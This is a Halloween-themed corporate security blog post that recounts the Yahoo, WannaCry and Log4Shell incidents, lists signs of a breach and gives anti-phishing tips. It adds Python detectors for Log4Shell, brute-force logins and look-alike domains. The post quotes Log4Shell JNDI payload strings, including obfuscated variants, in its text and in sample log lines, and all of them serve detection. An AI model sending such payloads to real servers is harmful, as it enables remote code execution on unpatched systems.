Trick or Threat?
It’s Halloween—that time of the year for goblins, ghosts, and the scariest things you have ever seen. Nowadays, this includes hackers.
Hackers may not be the first thing that comes to mind when you picture the standard ensemble (or should we say mash) of Halloween monsters, but the picture of them as an icon of horror has certainly evolved from the vigilante social activist we saw with V for Vendetta (although his resemblance to the Phantom of the Opera is certainly not one to be overlooked). And with almost everything we can conceive of being somehow online or in the cloud, the hacker threat is becoming as all-encompassing and inescapable as Michael Myers when he dons his mask.
Just how scary is the hacker? According to Security Magazine, more than 4,100 publicly disclosed data breaches occurred in 2022, leading to the exposure of 22 billion records. Globally, tens of thousands of websites are hacked daily, ransomware attacks happen by the second, and with 3.4 billion phishing emails being sent daily, statistically 1.2% of the emails piling into your inbox are malicious. It’s no wonder 62% of organizations cited phishing as the top cause of identity-related breaches in 2023, or that phishing reached an all-time high in 2022, with 4.7 million total phishing attacks logged over the course of the year.
Back in 2007, a University of Maryland study found that a cyberattack occurs every 39 seconds. Cybersecurity Ventures, in its 2023 Ransomware Report, predicts that ransomware alone will strike every 2 seconds by 2031, if we don’t get there sooner. Just imagine how much more frequently attacks are occurring now that threat actors can lean on advanced technology like AI to make their techniques even more efficient. Cap that off with the fact that 70% of all attacks involve attempts to move laterally across the network, and, according to the latest IBM Cost of a Data Breach Report, it takes companies an average of 204 days to identify a breach and another 73 days to contain it once identified. As a result, the global average cost of a data breach in 2023 was $4.45 million USD, a 15% increase over 3 years.
When we look at those statistics together, the scary story of the hacker becomes a lot, well, scarier—after all, the scariest stories are always based in fact. Do you believe in the boogeyman?
For this Halloween blog, I would like to highlight, as a reminder, some of the scariest tricks (breaches) ever and remind everyone to trick or treat—both online and offline—with safety in mind. After all, it is not called trick or treat for nothing….
3 Scary Cyber-Horror Stories
Here are a few scary stories you can tell your IT security teams after dark.
1. The Yahoo-loween Series: Yahoo Data Breaches (2013-2014, 2016)
Just like the numerous films of the Halloween franchise (I believe there are 13 total now, whether or not you count them all as canon), Yahoo experienced a series of data breaches that affected billions of user accounts. A 2013 breach, disclosed in late 2016 and first put at 1 billion accounts, was later found to have hit all 3 billion accounts that existed at the time, making it the largest breach ever disclosed. A separate 2014 intrusion, disclosed in September 2016, exposed data from 500 million accounts. Between them, the breaches exposed names, email addresses, telephone numbers, dates of birth, hashed passwords and, in some cases, security questions and answers, causing widespread concern about online privacy and security, along with the creeping realization that someone out there in the dark (a hacker) knows your name and where you live. This breach is a classic in terms of how scary a breach can be, and in revealing what really happens when cyber security, not unlike the neighborhood lore about the boogeyman, is not taken seriously.
2. Night of the Living Worm: WannaCry Ransomware Attack (2017)
WannaCry was a global ransomware attack (haunting almost every business with a horrific worm) that infected hundreds of thousands of computers in over 150 countries in a matter of days. It spread through a flaw in the SMBv1 file-sharing protocol of Microsoft Windows (MS17-010), using the leaked EternalBlue exploit, even though Microsoft had shipped a patch two months before the outbreak. The scale and speed of WannaCry raised alarms about nation-state exploit code being weaponized against everyone and drove home the importance of keeping software patched and retiring legacy protocols. If you picture a virus that could cause a zombie apocalypse on computers, WannaCry spread so fast it is no wonder it makes the top three list of cyber-horrors. Think zombie computers.
3. The Exorcism of Log4J (2021)
The Log4j vulnerability, known as CVE-2021-44228 and nicknamed Log4Shell, is a critical security flaw in Apache Log4j 2, a popular Java-based logging library (versions 2.0-beta9 through 2.14.1 were affected). Log4j would evaluate lookups embedded in the text it logged, so a string such as ${jndi:ldap://attacker-host/x} placed in any logged field, a User-Agent header or a username, for example, made the server fetch and run a class from the attacker’s directory server. Attackers exploited this to execute malicious code remotely, compromising the integrity and confidentiality of affected systems, much like a ghost possessing a person: once in, the code injected by the threat actors did whatever the hackers saw fit. Because the flaw needed nothing more than a malicious log message, it was a severe threat to web applications, servers, and any other software that embedded the library, often several dependencies deep. Organizations worldwide rushed to patch their systems and update affected software (Log4j 2.15.0 disabled the dangerous lookup by default, and 2.16.0 removed message lookups entirely). This cyber-possession tale highlighted the importance of timely security updates and of keeping an inventory of the applications that contain potentially vulnerable open-source libraries.
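To make the possession concrete: the payload rides in any string the application logs, and attackers quickly learned to disguise the ${jndi: marker with Log4j’s own nested lookups (${lower:j}, ${::-j}, URL encoding) so that naive grep rules missed it. The following Python is an added example, not code from the original post or from the Apache Log4j project; it unwinds those lookups in the order Log4j resolved them and then scans web access log lines. The log lines are constructed for the example, and 198.51.100.0/24 is a documentation range standing in for the attacker’s LDAP server.

```python
import re
import urllib.parse

# Innermost ${...} lookup: a body with no nested '$', '{' or '}' inside it
INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are really looking for once the disguises are stripped away
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Placeholders that hide an unresolved lookup from INNER until we are done
_OPEN, _CLOSE = "\x00", "\x01"


def _resolve(body: str) -> str:
    """Evaluate one lookup the way Log4j 2 did, for the handful of forms
    attackers used to hide the jndi prefix; anything else is kept as-is."""
    if ":-" in body:                       # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    prefix, sep, key = body.partition(":")
    if sep and prefix.lower() == "lower":  # ${lower:J} -> j
        return key.lower()
    if sep and prefix.lower() == "upper":  # ${upper:j} -> J
        return key.upper()
    return _OPEN + body + _CLOSE           # unknown lookup (jndi, date, ...)


def normalize(text: str) -> str:
    """URL-decode, then unwind nested lookups from the inside out until the
    text stops changing; lookups we do not evaluate are restored verbatim."""
    text = urllib.parse.unquote(text)
    for _ in range(32):                    # bound the nesting depth we unwind
        unwound = INNER.sub(lambda m: _resolve(m.group(1)), text)
        if unwound == text:
            break
        text = unwound
    return text.replace(_OPEN, "${").replace(_CLOSE, "}")


def scan(lines):
    """Return (line_number, normalized_snippet) for every line that still
    contains a JNDI lookup after de-obfuscation."""
    hits = []
    for number, raw in enumerate(lines, 1):
        norm = normalize(raw)
        match = JNDI.search(norm)
        if match:
            hits.append((number, norm[match.start():match.start() + 48]))
    return hits


# Constructed sample access log lines (not from a real system). Line 5 uses a
# harmless ${date:...} lookup to show that not every lookup is flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:15:21 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:16:02 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 400 0 "-" "curl/7.79.1"',
    '10.0.0.9 - - [10/Dec/2021:03:16:40 +0000] "GET /login HTTP/1.1" 200 0 "-" "%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fc%7D"',
    '10.0.0.11 - - [10/Dec/2021:03:17:00 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, snippet in scan(SAMPLE_LOG):
        print(f"line {number}: {snippet}")
```

Lines 2, 3 and 4 are reported; the plain, the nested-lookup and the URL-encoded forms all normalize to the same ${jndi:ldap:// prefix, while the benign ${date:yyyy} lookup on line 5 is left alone. The same normalizer works on request headers at a proxy or WAF, which is where you would rather catch it than in yesterday’s logs.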
While some readers may argue these are not the scariest of all time, I would remind them that each was the first horror hack of its type. Equifax, MOVEit, FireEye, and even the Mirai botnet replayed the same scripts: an unpatched flaw, self-propagating code, and a vulnerable component buried in everything. Their initial horror has desensitized us to many modern attacks, just as the original horror movies (The Exorcist, Carrie, A Nightmare on Elm Street, and my personal favorite, The Changeling with George C. Scott) opened the door for all the new ways modern horror cinema makes our skin crawl.
Handbook for the Recently Breached: Six Signs You’ve been Hacked
These may not be as obvious as crop circles or demonic symbols painted under your bed, but they are a few of the most tell-tale signs your organization is experiencing a cyber-horror story of its own.
- Multiple password retries, the jiggling doorknob of the cybersecurity world: one of the first signs of a breach is a burst of failed logins against a domain account (or a few guesses sprayed across many accounts) followed by login requests nobody recognizes. Multifactor authentication is your best bet for keeping this cyber-ghoul out, but beware of MFA fatigue: an attacker who already holds the password can bombard a user with push prompts until one is approved out of sheer annoyance, and that bites too!
- Strange messages coming from inside the organization: spear-phishing attempts now commonly come from threat actors impersonating business contacts and even C-level executives in your own company. The best defense here is to keep your employees well-versed in detecting phishing scams and deception techniques and to enforce good cyber hygiene. Are you hearing voices in the night?
- Unusual activity – book stacking and other inexplicable bumps in the network: monitor for access attempts from unusual locations, during odd hours, or even just outside the normal behavior patterns of employees. A security solution that can help detect abnormal behavior can significantly reduce the amount of time it takes to detect and respond to a breach. Why is the dog barking in the middle of the night?
- Things start moving in slow motion: a slow-running system may not just be locked in its own supernatural dimension; it could be running malicious software in the background (a cryptominer, for instance) or quietly transferring files outside your network.
- Cries for help: Cyber events can often be signaled by missing files or emails—things that seem benign on the surface but point to something much more sinister bubbling underneath. Don’t ignore a sudden influx of help desk requests involving anomalies like these. When was the last time you made a phone call and got a busy signal?
- Ransomware messages from beyond the grave (or locked-down network): This is probably one of the more obvious signs you’ve been hacked, but it’s important to know “who ya gonna call” in the event you do get a ransom message. Have your cyber response plan ready and make sure you include law enforcement and your cyber insurance company in your plan. Quick shout out to Ghostbusters!
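Several of these signs can be watched for mechanically. The following is an added example (not from the original post or any BeyondTrust product) of detection logic for the first sign and the odd-hours part of the third: it runs over a constructed list of authentication events (timestamp, account, source IP, outcome) and raises alerts for a burst of failures on one account, a spray of failures across many accounts from one source, a success that follows a burst of failures, and a successful login after dark. The thresholds and the definition of off-hours are assumptions to tune to your own baseline.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Tunables (assumed for this example; adjust to your own baseline)
WINDOW = timedelta(minutes=10)   # sliding window for counting failures
FAIL_THRESHOLD = 5               # failures on one account -> brute force
SPRAY_THRESHOLD = 4              # distinct accounts failed from one source -> spray
SUCCESS_AFTER = 3                # failures shortly before a success -> suspicious


def parse(events):
    """(timestamp_str, user, source_ip, outcome) -> sorted (datetime, user, ip, outcome)."""
    return sorted(
        (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), user, src, outcome)
        for ts, user, src, outcome in events
    )


def is_off_hours(ts):
    """Assumed 'after dark' window in the log's local time: 22:00 to 06:00."""
    return ts.hour < 6 or ts.hour >= 22


def detect(events):
    """Return a list of (kind, subject, source_ip, timestamp) alerts."""
    alerts = []
    fails_by_user = defaultdict(deque)   # user -> failure timestamps within WINDOW
    fails_by_src = defaultdict(dict)     # src  -> {user: last failure timestamp}
    for ts, user, src, outcome in parse(events):
        if outcome == "fail":
            recent = fails_by_user[user]
            recent.append(ts)
            while ts - recent[0] > WINDOW:          # drop failures outside the window
                recent.popleft()
            if len(recent) == FAIL_THRESHOLD:       # fire once per burst, not per retry
                alerts.append(("brute_force", user, src, ts))
            touched = fails_by_src[src]
            touched[user] = ts
            for u, t in list(touched.items()):
                if ts - t > WINDOW:
                    del touched[u]
            if len(touched) == SPRAY_THRESHOLD:     # one source, many accounts
                alerts.append(("password_spray", f"{len(touched)} accounts", src, ts))
        elif outcome == "success":
            prior = [t for t in fails_by_user[user] if ts - t <= WINDOW]
            if len(prior) >= SUCCESS_AFTER:         # the doorknob stopped jiggling
                alerts.append(("success_after_failures", user, src, ts))
            if is_off_hours(ts):
                alerts.append(("off_hours_login", user, src, ts))
    return alerts


# Constructed sample events (not from a real system); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges standing in for external sources.
SAMPLE_EVENTS = [
    ("2023-10-31 02:01:05", "alice", "203.0.113.7", "fail"),
    ("2023-10-31 02:01:40", "alice", "203.0.113.7", "fail"),
    ("2023-10-31 02:02:12", "alice", "203.0.113.7", "fail"),
    ("2023-10-31 02:02:50", "alice", "203.0.113.7", "fail"),
    ("2023-10-31 02:03:31", "alice", "203.0.113.7", "fail"),
    ("2023-10-31 02:04:10", "alice", "203.0.113.7", "fail"),
    ("2023-10-31 02:05:02", "alice", "203.0.113.7", "success"),
    ("2023-10-31 09:10:00", "bob", "198.51.100.20", "fail"),
    ("2023-10-31 09:10:30", "carol", "198.51.100.20", "fail"),
    ("2023-10-31 09:11:00", "dave", "198.51.100.20", "fail"),
    ("2023-10-31 09:11:30", "erin", "198.51.100.20", "fail"),
    ("2023-10-31 09:30:00", "frank", "10.0.0.4", "success"),
    ("2023-10-31 14:00:00", "alice", "10.0.0.8", "fail"),    # one typo at 2pm is normal
    ("2023-10-31 14:00:20", "alice", "10.0.0.8", "success"),
]

if __name__ == "__main__":
    for kind, subject, src, ts in detect(SAMPLE_EVENTS):
        print(f"{ts}  {kind:24s} {subject:12s} from {src}")
```

On the sample data this yields four alerts: a brute-force alert on alice’s fifth failure, a success-after-failures alert and an off-hours alert when her account finally logs in at 02:05, and a password-spray alert when 198.51.100.20 fails against its fourth distinct account. Alice’s single mistyped password in the afternoon produces nothing, which is the point: the signal is the pattern, not any one event.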
How to Protect Yourself from Cyber Monsters this Halloween
Here are some helpful Halloween tips that can double as strategies for keeping the cyber-monsters at bay.
- Always check your candy - Scrutinize website links, sender email addresses, and text messages; be on the lookout for suspicious requests, typos, sender domains that almost but not quite match the real company, and other red flags that the person you are talking to isn’t who they say they are.
- Only go to well-marked houses – Make sure the website you are on is the company’s actual site and not a spoof. This includes look-alike domains that swap in characters from other alphabets (Cyrillic or Greek letters that render just like Latin ones) to appear legitimate; the punycode (xn--) form that such a domain actually resolves under gives the disguise away.
- Watch for oncoming traffic – be aware of vulnerability and threat trends that are happening around you and incorporate lessons learned from recent breaches into your cybersecurity strategy, indicators of compromise, and incident response.
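The look-alike trick in the second tip can be checked mechanically. The following Python is an added example, not from the original post: it decodes punycode (xn--) labels to what the user actually sees, flags labels that mix alphabets, and maps a small, assumed subset of the Unicode confusables table onto Latin letters to see whether the result collides with a constructed watch list of domains you expect to visit.

```python
import unicodedata

# A small slice of the Unicode confusables table: Cyrillic letters that render
# like Latin ones. An assumption for this example, not the full table.
CONFUSABLES = {
    "\u0430": "a", "\u0441": "c", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0455": "s", "\u0458": "j",
    "\u04cf": "l", "\u04bb": "h",
}

# Constructed watch list: the real domains your users are expected to visit
WATCHLIST = {"paypal.com", "cisco.com", "beyondtrust.com"}


def to_unicode(domain):
    """Decode any punycode (xn--) labels so we inspect what the user sees."""
    labels = []
    for label in domain.strip().lower().split("."):
        if label.startswith("xn--"):
            label = label.encode("ascii").decode("idna")
        labels.append(label)
    return ".".join(labels)


def scripts(label):
    """Unicode script names ('LATIN', 'CYRILLIC', ...) of the letters in a label."""
    return {unicodedata.name(c).split()[0] for c in label if c.isalpha()}


def skeleton(domain):
    """Replace confusable letters with the Latin letters they imitate."""
    return "".join(CONFUSABLES.get(c, c) for c in domain)


def check(domain):
    """Classify a domain; 'lookalike_of' names the watch-listed domain it imitates."""
    uni = to_unicode(domain)
    host_labels = uni.split(".")[:-1]          # leave the TLD out of script mixing
    mixed = any(len(scripts(label)) > 1 for label in host_labels)
    sk = skeleton(uni)
    lookalike_of = sk if sk != uni and sk in WATCHLIST else None
    return {
        "input": domain,
        "unicode": uni,
        "mixed_script": mixed,
        "lookalike_of": lookalike_of,
        "suspicious": mixed or lookalike_of is not None,
    }


if __name__ == "__main__":
    # Constructed candidates: the real thing, a mixed-script fake (Cyrillic 'р' and
    # 'а' in front of Latin 'ypal'), and an all-Cyrillic fake of cisco.com in both
    # its Unicode and its punycode form.
    candidates = [
        "paypal.com",
        "\u0440\u0430ypal.com",
        "\u0441\u0456\u0455\u0441\u043e.com",
        "\u0441\u0456\u0455\u0441\u043e.com".encode("idna").decode("ascii"),
    ]
    for d in candidates:
        r = check(d)
        print(f"{d:28s} -> {r['unicode']:14s} mixed={r['mixed_script']!s:5s} lookalike_of={r['lookalike_of']}")
```

The mixed-script check catches the lazy fakes; the skeleton comparison is what catches an all-Cyrillic domain that passes the mixed-script test, which is exactly the class of domain a browser may render indistinguishably from the real one. In production you would feed this from proxy logs or a mail gateway and use the full confusables table rather than the dozen letters assumed here.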
Conclusion: Turn the Tables on the Cyber-Spooks
In the same way that any good Halloween horror story could feature ghosts, goblins, aliens, vampires, dolls, or even psychotic maniacs, the scariest cybersecurity horrors involve third-party vendors, worms, and exploits of open source libraries. This Halloween blog serves as a stark reminder of the ongoing and evolving threats in the cybersecurity landscape, and how scary they can be for anyone at any time. But don’t take this tale for granted. It's essential that you stay informed about the latest developments in cybersecurity; it’s the only way you’ll be able to protect against such threats and adapt to new attack vectors. Halloween may only be one day a year, but for these cyber attackers, the veil concealing your perimeter is always thin. You need to be ready for the jump scare at any moment.
Morey J. Haber, Chief Security Officer, BeyondTrust
Morey J. Haber is the Chief Security Officer at BeyondTrust. He has more than 25 years of IT industry experience and has authored four books: Privileged Attack Vectors, Asset Attack Vectors, Identity Attack Vectors, and Cloud Attack Vectors. He is a founding member of the industry group Transparency in Cyber, and in 2020 was elected to the Identity Defined Security Alliance (IDSA) Executive Advisory Board. Morey currently oversees BeyondTrust security and governance for corporate and cloud-based solutions and regularly consults for global periodicals and media. He originally joined BeyondTrust in 2012 as part of the eEye Digital Security acquisition, having served at eEye as a Product Owner and Solutions Engineer since 2004. Prior to eEye, he was Beta Development Manager for Computer Associates, Inc. He began his career as a Reliability and Maintainability Engineer for a government contractor building flight and training simulators. He earned a Bachelor of Science degree in Electrical Engineering from the State University of New York at Stony Brook.